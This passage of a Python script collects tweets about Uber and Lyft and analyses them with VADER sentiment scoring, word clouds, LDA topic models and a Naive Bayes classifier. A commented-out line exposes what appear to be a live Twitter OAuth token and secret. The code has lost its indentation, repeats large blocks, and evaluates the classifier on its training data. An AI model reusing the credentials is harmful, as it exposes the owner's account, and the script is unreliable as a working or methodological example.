x = re.sub(r"^(http:\/\/www\.|https:\/\/www\.|http:\/\/|https:\/\/)?[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}(:[0-9]{1,5})?(\/.*)?$"," ", i)
x = re.sub(r"htt\S+"," ", x) #x = x.decode('utf-8')
x = re.sub(r"pic.twit\S+"," ", x)
x = re.sub(r"www.\S+"," ", x)
x = re.sub(r"www.\S+"," ", x)
x = re.sub(r"@\S+"," ", x)
x = re.sub(r"\xa0"," ", x)
x = re.sub(r"\\u\S+"," ", x)
x = x.replace('#',' ')
x = x.replace('amp;','&')
x = x.replace('gt;',' ')
x = x.replace('\\n',' ')
y = x.replace('$',' ')
y = y.replace('(',' ')
y = y.replace('–',' ')
y = y.replace('‘',' ')
y = y.replace('“',' ')
y = y.replace('”',' ')
y = y.replace('`',' ')
y = y.replace(']',' ')
y = y.replace('[',' ')
y = y.replace(';',' ')
y = y.replace(')',' ')
y = y.replace('/',' ')
y = y.replace('*',' ')
y = y.replace(',',' ')
y = y.replace('’','')
y = y.replace('.','')
y = y.replace('-',' ')
y = y.replace("'",'')
y = y.replace(':',' ')
y = y.replace('@',' ')
y = y.replace('!',' ')
y = y.replace('…',' ')
y = y.replace('?',' ')
y = y.replace('>',' ')
y = y.replace('&',' ')
y = y.replace("\\","")
y = y.replace("\\u2066","")
tweetvector_clean.append(y)
tweetvector_tokenized = []
for i in tweetvector_clean:
x = word_tokenize(i)
tweetvector_tokenized.append(x)
tweetvector_stopped = []
for i in tweetvector_tokenized:
newstatement = [j for j in i if j not in stop_words]
tweetvector_stopped.append(newstatement)
####
final_tweets = []
for i in tweetvector_stopped:
x = " ".join(i)
final_tweets.append(x)
sid = nltk.sentiment.vader.SentimentIntensityAnalyzer()
compound = []
neutral = []
negative = []
positive = []
for i in final_tweets:
ss = sid.polarity_scores(i)
comp = ss['compound']
neg = ss['neg']
neu = ss['neu']
pos = ss['pos']
compound.append(comp)
neutral.append(neu)
negative.append(neg)
positive.append(pos)
tweet_df = pd.DataFrame()
tweet_df['datetime'] = times
tweet_df['text'] = text
tweet_df['retweet_cnt'] = retweet_cnt
tweet_df['fvrt_cnt'] = fvrt_cnt
tweet_df['final_tweets'] = final_tweets
tweet_df['compound'] = compound
tweet_df['positive'] = positive
tweet_df['neutral'] = neutral
tweet_df['negative'] = negative
date = []
time = []
for i in list(times):
x = dt.datetime.strptime(i,"%a %b %d %H:%M:%S %z %Y")
d = dt.datetime.strftime(x,"%Y-%m-%d")
t = dt.datetime.strftime(x,"%H:%M:%S")
date.append(d)
time.append(t)
tweet_df['date'] = date
tweet_df['time'] = time
tweet_non_neutral = tweet_df[tweet_df['compound'] != 0]
tweet_neutral = tweet_df[tweet_df['compound'] == 0 ]
tweet_summary = pd.pivot_table(tweet_non_neutral, values = ['compound'],index = ['date'], aggfunc = 'mean')
tweet_count = pd.pivot_table(tweet_non_neutral, values = ['compound'],index = ['date'], aggfunc = 'count')
tweet_all_count = pd.pivot_table(tweet_df, values = ['compound'],index = ['date'], aggfunc = 'count')
tweet_summary.reset_index(inplace = True, drop = False)
tweet_count.reset_index(inplace = True, drop = False)
tweet_all_count.reset_index(inplace = True, drop = False)
tweet_summary = pd.merge(tweet_summary,tweet_count, on = 'date', how = 'left')
tweet_summary = pd.merge(tweet_summary,tweet_all_count, on = 'date', how = 'left')
tweet_summary = tweet_summary.rename(index = str, columns = {'compound_x':'mean_compound','compound_y':'non_neutral_tweets','compound':'total_tweets'})
now = dt.datetime.strftime(dt.datetime.now(),"%Y-%m-%d")
tweet_df.to_csv("C://Users/jliv/Downloads/tweets/tweettest/"+terma+"tweets"+startdate+".csv")
tweet_summary.to_csv("C://Users/jliv/Downloads/tweets/"+terma+"scores"+startdate+".csv")
searchterm = '"Uber"'
terma = searchterm.replace('"',"")
terma = terma.replace(" ","")
language = 'en'
startdate = dt.datetime.now()
to_date = startdate + dt.timedelta(1)
startdate = dt.datetime.strftime(startdate,"%Y-%m-%d")
to_date = dt.datetime.strftime(to_date,"%Y-%m-%d")
#startdate = "2019-02-05"
#to_date = "2019-02-06"
max_tweets = 1000
appendix = "v1"
#exclude = ['-Congrats','-Stand','-Laura','-Why']
exclude = ['']
#How = mixed, recent or popular
how = 'mixed'
searchterm = searchterm.split()
searchterm = "%20".join(searchterm)
enddate = dt.datetime.strftime(dt.datetime.strptime(startdate,"%Y-%m-%d") +dt.timedelta(1),"%Y-%m-%d")
days = dt.datetime.strptime(to_date,"%Y-%m-%d") - dt.datetime.strptime(startdate,"%Y-%m-%d")
days = days.days
exclude = "%20".join(exclude)
parameters = (language,searchterm,startdate,enddate)
#raw_query="l={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type=mixed&count=1000".format(language,searchterm,exclude,startdate,enddate)
times = []
date = []
text = []
retweet_cnt = []
fvrt_cnt = []
user = []
user_flwrs=[]
user_statuses = []
timezone = []
'''len(text)
lengths = []
for i in text:
lengths.append(len(i))'''
#raw_query="l={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type=mixed&tweet_mode=extended&count=1000".format(language,searchterm,exclude,startdate,enddate)
#query = 'https://api.twitter.com/1.1/search/tweets.json?'+raw_query
#home_timeline = oauth_req(query, '986743245127503872-ePHRirA1hxJsMVPjogWbFSeZFmo4V5Q'.encode('utf-8'), 'N4PqSMhHGqjlZ2yqmLnPB8cFJgPXfMsj7PbzSrk55ageO'.encode('utf-8') )
raw_query="lang={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type={}&count=1000&tweet_mode=extended".format(language,searchterm,exclude,startdate,enddate,how)
query = 'https://api.twitter.com/1.1/search/tweets.json?'+raw_query
home_timeline = req(query)
home_timeline = home_timeline.decode("utf-8")
home_timeline = json.loads(home_timeline)
statuses = home_timeline['statuses']
print(len(statuses))
for i in range(len(statuses)):
times.append(statuses[i]['created_at'])
try:
text.append(statuses[i]['retweeted_status']['full_text'])
except:
text.append(statuses[i]['full_text'])
fvrt_cnt.append(statuses[i]['favorite_count'])
retweet_cnt.append(statuses[i]['retweet_count'])
user.append(statuses[i]['user']['name'])
user_flwrs.append(statuses[i]['user']['followers_count'])
user_statuses.append(statuses[i]['user']['statuses_count'])
timezone.append(statuses[i]['user']['time_zone'])
emojis = pd.read_csv('C://Users/jliv/Downloads/emojis.txt',sep = '\t', encoding = 'utf-8')
#Map of Unicode and Names
emoji_map = pd.DataFrame()
emoji_map['name'] = emojis['Name(s)']
emoji_map['code'] = emojis['Escaped Unicode']
#Map of Emojis and names
emoji_map1 = pd.DataFrame()
emoji_map1['name'] = emojis['Name(s)']
emoji_map1['Emoji'] = emojis['Emoji']
#Handle escape characters in unicode
codes = []
for i in list(emojis['Escaped Unicode']):
x = i.replace("\\","\\")
codes.append(x)
emojislist = emoji_map1['Emoji']
#Convert CSVs of mappings to dict mappings
emoji_map.index = codes
emoji_dict = emoji_map.to_dict()
emoji_dict = emoji_dict['name']
emoji_map1.index = emojislist
emoji_dict1 = emoji_map1.to_dict()
emoji_dict1 = emoji_dict1['name']
#Replace tweet emojis and unicode with descriptions of characters
emoji_clean = []
for i in text:
x = i
for k,v in emoji_dict1.items():
x = x.replace(k, v)
for k,v in emoji_dict.items():
x = x.replace(k, v)
emoji_clean.append(x)
tweetvector_clean = []
for i in emoji_clean:
x = re.sub(r"^(http:\/\/www\.|https:\/\/www\.|http:\/\/|https:\/\/)?[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}(:[0-9]{1,5})?(\/.*)?$"," ", i)
x = re.sub(r"htt\S+"," ", x) #x = x.decode('utf-8')
x = re.sub(r"pic.twit\S+"," ", x)
x = re.sub(r"www.\S+"," ", x)
x = re.sub(r"www.\S+"," ", x)
x = re.sub(r"@\S+"," ", x)
x = re.sub(r"\xa0"," ", x)
x = re.sub(r"\\u\S+"," ", x)
x = x.replace('#',' ')
x = x.replace('amp;','&')
x = x.replace('gt;',' ')
x = x.replace('\\n',' ')
y = x.replace('$',' ')
y = y.replace('(',' ')
y = y.replace('–',' ')
y = y.replace('‘',' ')
y = y.replace('“',' ')
y = y.replace('”',' ')
y = y.replace('`',' ')
y = y.replace(']',' ')
y = y.replace('[',' ')
y = y.replace(';',' ')
y = y.replace(')',' ')
y = y.replace('/',' ')
y = y.replace('*',' ')
y = y.replace(',',' ')
y = y.replace('’','')
y = y.replace('.','')
y = y.replace('-',' ')
y = y.replace("'",'')
y = y.replace(':',' ')
y = y.replace('@',' ')
y = y.replace('!',' ')
y = y.replace('…',' ')
y = y.replace('?',' ')
y = y.replace('>',' ')
y = y.replace('&',' ')
y = y.replace("\\","")
y = y.replace("\\u2066","")
tweetvector_clean.append(y)
tweetvector_tokenized = []
for i in tweetvector_clean:
x = word_tokenize(i)
tweetvector_tokenized.append(x)
tweetvector_stopped = []
for i in tweetvector_tokenized:
newstatement = [j for j in i if j not in stop_words]
tweetvector_stopped.append(newstatement)
####
final_tweets = []
for i in tweetvector_stopped:
x = " ".join(i)
final_tweets.append(x)
sid = nltk.sentiment.vader.SentimentIntensityAnalyzer()
compound = []
neutral = []
negative = []
positive = []
for i in final_tweets:
ss = sid.polarity_scores(i)
comp = ss['compound']
neg = ss['neg']
neu = ss['neu']
pos = ss['pos']
compound.append(comp)
neutral.append(neu)
negative.append(neg)
positive.append(pos)
tweet_df = pd.DataFrame()
tweet_df['datetime'] = times
tweet_df['text'] = text
tweet_df['retweet_cnt'] = retweet_cnt
tweet_df['fvrt_cnt'] = fvrt_cnt
tweet_df['final_tweets'] = final_tweets
tweet_df['compound'] = compound
tweet_df['positive'] = positive
tweet_df['neutral'] = neutral
tweet_df['negative'] = negative
date = []
time = []
for i in list(times):
x = dt.datetime.strptime(i,"%a %b %d %H:%M:%S %z %Y")
d = dt.datetime.strftime(x,"%Y-%m-%d")
t = dt.datetime.strftime(x,"%H:%M:%S")
date.append(d)
time.append(t)
tweet_df['date'] = date
tweet_df['time'] = time
tweet_non_neutral = tweet_df[tweet_df['compound'] != 0]
tweet_neutral = tweet_df[tweet_df['compound'] == 0 ]
tweet_summary = pd.pivot_table(tweet_non_neutral, values = ['compound'],index = ['date'], aggfunc = 'mean')
tweet_count = pd.pivot_table(tweet_non_neutral, values = ['compound'],index = ['date'], aggfunc = 'count')
tweet_all_count = pd.pivot_table(tweet_df, values = ['compound'],index = ['date'], aggfunc = 'count')
tweet_summary.reset_index(inplace = True, drop = False)
tweet_count.reset_index(inplace = True, drop = False)
tweet_all_count.reset_index(inplace = True, drop = False)
tweet_summary = pd.merge(tweet_summary,tweet_count, on = 'date', how = 'left')
tweet_summary = pd.merge(tweet_summary,tweet_all_count, on = 'date', how = 'left')
tweet_summary = tweet_summary.rename(index = str, columns = {'compound_x':'mean_compound','compound_y':'non_neutral_tweets','compound':'total_tweets'})
now = dt.datetime.strftime(dt.datetime.now(),"%Y-%m-%d")
tweet_df.to_csv("C://Users/jliv/Downloads/tweets/tweettest/"+terma+"tweets"+startdate+".csv")
tweet_summary.to_csv("C://Users/jliv/Downloads/tweets/"+terma+"scores"+startdate+".csv")
#Assemble all collected data for each brand
#560 - 631
imlist = listdir("C://Users/jliv/Downloads/tweets/tweettest/")
len(imlist)
lyftlist = [x for x in imlist if 'Lyfttweets' in x]
lyftdf = pd.read_csv('C://Users/jliv/Downloads/tweets/tweettest/'+lyftlist[0])
for i in lyftlist[1:]:
temp = pd.read_csv('C://Users/jliv/Downloads/tweets/tweettest/'+i)
lyftdf = lyftdf.append(temp)
lyftdf.reset_index(inplace= True, drop = True)
imlist = listdir("C://Users/jliv/Downloads/tweets/tweettest/")
len(imlist)
uberlist = [x for x in imlist if 'Ubertweets' in x]
uberdf = pd.read_csv('C://Users/jliv/Downloads/tweets/tweettest/'+uberlist[0])
for i in uberlist[1:]:
temp = pd.read_csv('C://Users/jliv/Downloads/tweets/tweettest/'+i)
uberdf = uberdf.append(temp)
uberdf.reset_index(inplace= True, drop = True)
lyftdf['comp'] = 'lyft'
uberdf['comp'] = 'uber'
nltk.download('wordnet')
stemmer = SnowballStemmer('english')
def lemmatize_stemming(text):
return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))
def preprocess(text):
result = []
for token in gensim.utils.simple_preprocess(text):
if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3:
result.append(lemmatize_stemming(token))
return result
docdf = uberdf.append(lyftdf)
docdf.reset_index(inplace = True, drop = True)
docdf['final_tweets'] = docdf['final_tweets'].fillna(" ")
docs = list(docdf['final_tweets'])
docs1 = []
for i in docs:
x = i.lower().replace('lyft',"").replace('uber',"")
docs1.append(x)
docdf['final_tweets2'] = docs1
docdf2 = pd.pivot_table(data = docdf, index = ['final_tweets2'], values=['compound'], aggfunc = 'count')
docdf2.reset_index(inplace = True, drop = False)
#processed_docs = docdf2['final_tweets2'].map(preprocess)
processed_docs = docdf['final_tweets2'].map(preprocess)
merged = []
for i in processed_docs:
merged.append(" ".join(i))
docdf['final_tweets2_stemmed'] = merged
docdf.to_csv('C://Users/jliv/Downloads/tweets/tweets_collected.csv')
#Lyft Wordcloud
#641 - 794
tweetdf = pd.read_csv("C://Users/jliv/Downloads/tweets/tweets_collected.csv")
tweetdf = tweetdf[tweetdf['comp']=='lyft']
tweetdf.reset_index(inplace = True, drop = True)
tweetdf['final_tweets2_stemmed'] = tweetdf['final_tweets2_stemmed'].fillna(' ')
#CREATE WORDCLOUD WITH LABELED TWEETS
#Create df of each occurrence of word with scores of tweet
tweetlist = list(tweetdf['final_tweets2_stemmed'])
tokenized = []
compound = []
negative = []
neutral = []
positive = []
date = []
for i in range(len(tweetlist)):
tokenized.append(tweetlist[i].split())
compound.append(tweetdf['compound'][i])
negative.append(tweetdf['negative'][i])
neutral.append(tweetdf['neutral'][i])
positive.append(tweetdf['positive'][i])
date.append(tweetdf['date'][i])
words = []
compound2 = []
negative2 = []
neutral2 = []
positive2 = []
date2 = []
for i in range(len(tokenized)):
for j in tokenized[i]:
words.append(j.lower())
compound2.append(compound[i])
negative2.append(negative[i])
neutral2.append(neutral[i])
positive2.append(positive[i])
date2.append(date[i])
wordsdf = pd.DataFrame()
wordsdf['date'] = date2
wordsdf['words'] = words
wordsdf['compound'] = compound2
wordsdf['negative'] = negative2
wordsdf['neutral'] = neutral2
wordsdf['positive'] = positive2
#DFs of unique words with average score when used
wordssent = pd.pivot_table(data = wordsdf, values = ['compound','negative','neutral','positive'], index = ['words'], aggfunc = 'mean')
wordscount = pd.pivot_table(data = wordsdf, values = ['compound'], index = ['words'], aggfunc = 'count')
wordssent['count'] = wordscount['compound']
#Sorted by Use
wordssent.sort_values(by = 'count', ascending = False, inplace = True)
#Sorted by Negative Sentiment
words_negative_sent = wordssent.copy()
words_negative_sent.sort_values(by = 'compound', ascending = True, inplace = True)
words_negative_sent[words_negative_sent['count'] > 10]
#Sorted by Positive Sentiment
words_positive_sent = wordssent.copy()
words_positive_sent.sort_values(by = 'compound', ascending = False, inplace = True)
time_df = pd.pivot_table(tweetdf, index = 'date',values = 'compound', aggfunc = 'mean')
wordssent.reset_index(drop = False, inplace = True)
#Wordcloud wordcloud
class SimpleGroupedColorFunc(object):
"""Create a color function object which assigns EXACT colors
to certain words based on the color to words mapping
Parameters
----------
color_to_words : dict(str -> list(str))
A dictionary that maps a color to the list of words.
default_color : str
Color that will be assigned to a word that's not a member
of any value from color_to_words.
"""
def __init__(self, color_to_words, default_color):
self.word_to_color = {word: color
for (color, words) in color_to_words.items()
for word in words}
self.default_color = default_color
def __call__(self, word, **kwargs):
return self.word_to_color.get(word, self.default_color)
compmin = min(wordssent['compound'])
compmax = max(wordssent['compound'])
compmin = -1
compmax = 1
n = 30
wordrepeats = []
wordrepeats_sent = []
for i,j,l in zip(list(wordssent[wordssent['count']>n]['words']),list(wordssent[wordssent['count']>n]['count']),list(wordssent[wordssent['count']>n]['compound'])):
for k in range(j):
wordrepeats.append(i.lower())
wordrepeats_sent.append(l)
text = " ".join(wordrepeats)
UW = []
color = []
for i,j in zip(list(wordssent[wordssent['count']>n]['words']),list(wordssent[wordssent['count']>n]['compound'])):
UW.append(i)
color.append('rgb('+str(int(255*(1- (j-compmin)/(compmax-compmin))))+','+str(int(155*(j-compmin)/(compmax-compmin)))+', 0)')
colorset = list(set(color))
color_to_words = {}
for i in colorset:
words_by_color = []
for j in range(len(UW)):
if color[j] == i:
words_by_color.append(UW[j])
else:
pass
color_to_words[i] = words_by_color
grouped_color_func = SimpleGroupedColorFunc(color_to_words, 'grey')
wordcloud = WordCloud(collocations = False,width = 800, height = 500,background_color = "black").generate(text)
wordcloud.recolor(color_func=grouped_color_func)
# Display the generated image:
# the matplotlib way:
plt.figure( figsize=(8,6) )
plt.imshow(wordcloud)
plt.axis("off")
plt.title("Lyft Word Cloud")
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/lyft_wordcloud.png")
#Uber Wordcloud
#800 - 963
#tweetdf = pd.read_csv('C://users/jliv/downloads/tweets/lda_tweets.csv')
tweetdf = pd.read_csv("C://Users/jliv/Downloads/tweets/tweets_collected.csv")
tweetdf = tweetdf[tweetdf['comp']=='uber']
tweetdf.reset_index(inplace = True, drop = True)
tweetdf['final_tweets2_stemmed'] = tweetdf['final_tweets2_stemmed'].fillna(' ')
#CREATE WORDCLOUD WITH LABELED TWEETS
#Create df of each occurrence of word with scores of tweet
tweetlist = list(tweetdf['final_tweets2_stemmed'])
tokenized = []
compound = []
negative = []
neutral = []
positive = []
date = []
for i in range(len(tweetlist)):
tokenized.append(tweetlist[i].split())
compound.append(tweetdf['compound'][i])
negative.append(tweetdf['negative'][i])
neutral.append(tweetdf['neutral'][i])
positive.append(tweetdf['positive'][i])
date.append(tweetdf['date'][i])
words = []
compound2 = []
negative2 = []
neutral2 = []
positive2 = []
date2 = []
for i in range(len(tokenized)):
for j in tokenized[i]:
words.append(j.lower())
compound2.append(compound[i])
negative2.append(negative[i])
neutral2.append(neutral[i])
positive2.append(positive[i])
date2.append(date[i])
wordsdf = pd.DataFrame()
wordsdf['date'] = date2
wordsdf['words'] = words
wordsdf['compound'] = compound2
wordsdf['negative'] = negative2
wordsdf['neutral'] = neutral2
wordsdf['positive'] = positive2
#DFs of unique words with average score when used
wordssent = pd.pivot_table(data = wordsdf, values = ['compound','negative','neutral','positive'], index = ['words'], aggfunc = 'mean')
wordscount = pd.pivot_table(data = wordsdf, values = ['compound'], index = ['words'], aggfunc = 'count')
wordssent['count'] = wordscount['compound']
#Sorted by Use
wordssent.sort_values(by = 'count', ascending = False, inplace = True)
#Sorted by Negative Sentiment
words_negative_sent = wordssent.copy()
words_negative_sent.sort_values(by = 'compound', ascending = True, inplace = True)
words_negative_sent[words_negative_sent['count'] > 10]
#Sorted by Positive Sentiment
words_positive_sent = wordssent.copy()
words_positive_sent.sort_values(by = 'compound', ascending = False, inplace = True)
time_df = pd.pivot_table(tweetdf, index = 'date',values = 'compound', aggfunc = 'mean')
#from PIL import Image, ImageDraw, ImageFont
#import math
# create Image object with the input image
#image = Image.open('background.png')
wordssent.reset_index(drop = False, inplace = True)
#Wordcloud wordcloud
class SimpleGroupedColorFunc(object):
"""Create a color function object which assigns EXACT colors
to certain words based on the color to words mapping
Parameters
----------
color_to_words : dict(str -> list(str))
A dictionary that maps a color to the list of words.
default_color : str
Color that will be assigned to a word that's not a member
of any value from color_to_words.
"""
def __init__(self, color_to_words, default_color):
self.word_to_color = {word: color
for (color, words) in color_to_words.items()
for word in words}
self.default_color = default_color
def __call__(self, word, **kwargs):
return self.word_to_color.get(word, self.default_color)
compmin = min(wordssent['compound'])
compmax = max(wordssent['compound'])
compmin = -1
compmax = 1
n = 30
wordrepeats = []
wordrepeats_sent = []
for i,j,l in zip(list(wordssent[wordssent['count']>n]['words']),list(wordssent[wordssent['count']>n]['count']),list(wordssent[wordssent['count']>n]['compound'])):
for k in range(j):
wordrepeats.append(i.lower())
wordrepeats_sent.append(l)
text = " ".join(wordrepeats)
UW = []
color = []
for i,j in zip(list(wordssent[wordssent['count']>n]['words']),list(wordssent[wordssent['count']>n]['compound'])):
UW.append(i)
color.append('rgb('+str(int(255*(1- (j-compmin)/(compmax-compmin))))+','+str(int(155*(j-compmin)/(compmax-compmin)))+', 0)')
colorset = list(set(color))
color_to_words = {}
for i in colorset:
words_by_color = []
for j in range(len(UW)):
if color[j] == i:
words_by_color.append(UW[j])
else:
pass
color_to_words[i] = words_by_color
grouped_color_func = SimpleGroupedColorFunc(color_to_words, 'grey')
wordcloud = WordCloud(collocations = False,width = 800, height = 500,background_color = "black").generate(text)
wordcloud.recolor(color_func=grouped_color_func)
# Display the generated image:
# the matplotlib way:
plt.figure( figsize=(8,6) )
plt.imshow(wordcloud)
plt.axis("off")
plt.title("Uber Word Cloud")
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/uber_wordcloud.png")
#Topic Modeling TFIDF and LDA
#967 - 1088
tweetdf = pd.read_csv("C://Users/jliv/Downloads/tweets/tweets_collected.csv")
tweetdf['final_tweets2'] = tweetdf['final_tweets2'].fillna(" ")
processed_docs = tweetdf['final_tweets2'].map(preprocess)
dictionary = gensim.corpora.Dictionary(processed_docs)
count = 0
for k, v in dictionary.iteritems():
print(k, v)
count += 1
if count > 100:
break
dictionary.filter_extremes(no_below=2, no_above=0.09, keep_n=1000)
#len(dictionary)
bow_corpus = [dictionary.doc2bow(doc) for doc in processed_docs]
#Method 1 BAG OF WORDS LDA
lda_model = gensim.models.LdaMulticore(bow_corpus, num_topics=4, id2word=dictionary, passes=2, workers=2)
for idx, topic in lda_model.print_topics(-1):
print('Topic: {} \nWords: {}'.format(idx, topic))
#Method 2 TDIDF lda
#Fit Model
tfidf = models.TfidfModel(bow_corpus)
#Apply Model
corpus_tfidf = tfidf[bow_corpus]
lda_model_tfidf = gensim.models.LdaMulticore(corpus_tfidf, num_topics=4, id2word=dictionary, passes=2, workers=4)
model_info = []
for idx, topic in lda_model_tfidf.print_topics(-1):
model_info.append('Topic: {} Word: {}'.format(idx, topic))
filename = 'C://Users/jliv/downloads/tweets/lda_tdidf.mod'
pickle.dump(lda_model_tfidf, open(filename, 'wb'))
for index, score in sorted(lda_model_tfidf[bow_corpus[500]], key=lambda tup: -1*tup[1]):
print("\nScore: {}\t \nTopic: {}".format(score, lda_model_tfidf.print_topic(index, 5)))
topic = []
for i in list(tweetdf['final_tweets2']):
unseen_document = i
bow_vector = dictionary.doc2bow(preprocess(unseen_document))
bv2 = tfidf[bow_vector]
topic.append(sorted(lda_model_tfidf[bv2], key=lambda tup: -1*tup[1])[0][0])
#topic.append(sorted(lda_model_tfidf[bow_vector], key=lambda tup: -1*tup[1])[0][0])
#topic.append(sorted(lda_model[bow_corpus], key=lambda tup: -1*tup[1])[0][0])
#unseen_document = 'my driver was terrible'
#bow_vector = dictionary.doc2bow(preprocess(unseen_document))
#for index, score in sorted(lda_model[bow_vector], key=lambda tup: -1*tup[1])[0][0]:
# print("Score: {}\t Topic: {}".format(score, lda_model.print_topic(index, 5)))
tweetdf['ldatopic'] = topic
tfidflist_tweetlevel = []
for i in range(len(processed_docs)):
tfidflist_tweetlevel.append(corpus_tfidf[i])
tweetdf['tfidf'] = tfidflist_tweetlevel
tweetdf['processed_docs'] = processed_docs
tfidflen = []
doclen = []
for i in range(len(corpus_tfidf)):
tfidflen.append(len(corpus_tfidf[i]))
doclen.append(len(processed_docs[i]))
tweetdf['tfidflen'] = tfidflist_tweetlevel
tweetdf['doclen'] = processed_docs
tweetdf['final_tweets2_stemmed'] = tweetdf['final_tweets2_stemmed'].fillna(" ")
docss = len(tweetdf)
tfidflist_jl = []
tfidflist_jl_norm = []
for i in range(len(tweetdf)):
twt = processed_docs[i]
tmptfidf = []
for j in twt:
worddocs = len(tweetdf[tweetdf['final_tweets2_stemmed'].str.contains(j)])
idf = np.log(docss/worddocs)
tf = sum(1 for k in twt if k == j)/len(twt)
tfidfres = tf*idf
tmptfidf.append(tfidfres)
try:
tmptfidf_n = tmptfidf/max(tmptfidf)
except:
tmptfidf_n = [1]
tfidflist_jl_norm.append(tmptfidf_n)
tfidflist_jl.append(tmptfidf)
tfidfsums = []
for i in tfidflist_jl:
tfidfsums.append(sum(i))
tfidfvect = []
for i in tfidflist_jl:
for j in i:
tfidfvect.append(j)
plt.hist(tfidfvect, bins = 40)
plt.show()
tweetdf['tfidf_jl'] = tfidflist_jl
tweetdf['tfidflist_jl_norm'] = tfidflist_jl_norm
tweetdf.to_csv("C://users/jliv/downloads/tweets/tweets_collected_lda_tfidf.csv")
#Naive Bayes Classifier
#1095 - 1167
tweetdf = pd.read_csv("C://users/jliv/downloads/tweets/tweets_collected_lda_tfidf.csv")
corpuslist = listdir("C://Users/jliv/Downloads/tweets/corpus/")
corpusdf = pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+corpuslist[0])
for i in corpuslist[1:]:
corpusdf = corpusdf.append(pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+i))
def document_features(document):
document_words = set(document)
features = {}
for word in word_features:
features['contains({})'.format(word)] = (word in document_words)
return features
corpusdf['count'] = 1
corpusdf2 = pd.pivot_table(data = corpusdf, index = ['final_tweets','label'], values = ['count'], aggfunc = 'sum')
corpusdf2.reset_index(inplace=True, drop = False)
corpusdf2['final_tweets'] = corpusdf2['final_tweets'].fillna(" ")
rand_tweets_labels = list(corpusdf2['label'])
unique_tweets = list(corpusdf2['final_tweets'])
tweet_doc = []
for i in unique_tweets:
x = i.lower()
tweet_doc.append(x.split())
unique_words = []
for i in unique_tweets:
x = i.split()
for j in x:
unique_words.append(j.lower())
UW = pd.DataFrame()
UW['unique_words'] = unique_words
UW['count'] = 1
UW_piv = pd.pivot_table(data = UW, values = 'count', index = 'unique_words', aggfunc = 'sum')
UW_piv = UW_piv.sort_values(by = 'count', ascending = False)
unique_words2 = list(UW_piv.index)
dropping = ['i','the','``',"''"]
unique_words3 = [i for i in unique_words2 if i not in dropping]
word_features =unique_words3[:300]
ww = UW_piv.copy()
ww.reset_index(inplace= True)
ww = list(ww[(ww['count'] >= 20)&(ww['count'] <= 30)]['unique_words'])
word_features = list(word_features)+ww
#word_features =unique_words3
from random import shuffle
tweet_featset = [(document_features(d), c) for (d,c) in zip(tweet_doc,rand_tweets_labels)]
tweet_featset2 = tweet_featset
shuffle(tweet_featset2)
train_set, test_set = tweet_featset[:len(tweet_featset)], tweet_featset[:len(tweet_featset)]
#train_set, test_set = tweet_featset2[:int(len(tweet_featset2)*.75)], tweet_featset2[int(len(tweet_featset2)*.75):]
classifier = nltk.NaiveBayesClassifier.train(train_set)
classifier.show_most_informative_features(30)
nltk.classify.accuracy(classifier, test_set)
unique_tweets = tweetdf['final_tweets']
tweets_split = []
for i in unique_tweets:
tweets_split.append(i.split())
new_labels = []
probs = []
for i in tweets_split:
test_features = [(document_features(i), 'test')]
new_labels.append(classifier.classify(test_features[0][0]))
dist = classifier.prob_classify(test_features[0][0])
probs.append(dist.prob(classifier.classify(test_features[0][0])))
tweetdf['NB_label'] = new_labels
tweetdf['NB_label_prob'] = probs
tweetdf.to_csv("C://users/jliv/downloads/tweets/tweets_NBC_Labels.csv")
len(tweetdf[tweetdf['NB_label']=='promotional']['text'])
#Time Sentiment and Topic Analysis by Naive Bayes Label
#1171 - 1321
tweetdf = pd.read_csv("C://users/jliv/downloads/tweets/tweets_NBC_Labels.csv")
lyftdf1 = tweetdf[tweetdf['comp']=='lyft']
uberdf1 = tweetdf[tweetdf['comp']=='uber']
ubermean = np.mean(uberdf1['compound'])
lyftmean = np.mean(lyftdf1['compound'])
lyftscoresdf = pd.pivot_table(data = lyftdf1, index = ['NB_label'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf1, index = ['NB_label'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.title('Naive Bayes Classifier Topics: Lyft Promo Tweets are more positive, Otherwise Similar Sentiment')
plt.legend(loc = 2)
plt.xticks(range(4),list(lyftscoresdf['NB_label']), rotation = 45)
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Topics_Sentiment_NBC.png")
plt.show()
lyftscoresdf = pd.pivot_table(data = lyftdf1, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf1, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NBC Topic ALL: Few meaningful differences, lower dives for Uber Sentiment')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_NBC.png")
plt.show()
topic = 'financial'
lyftdf2 = lyftdf1[lyftdf1['NB_label']==topic]
uberdf2 = uberdf1[uberdf1['NB_label']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10,8))
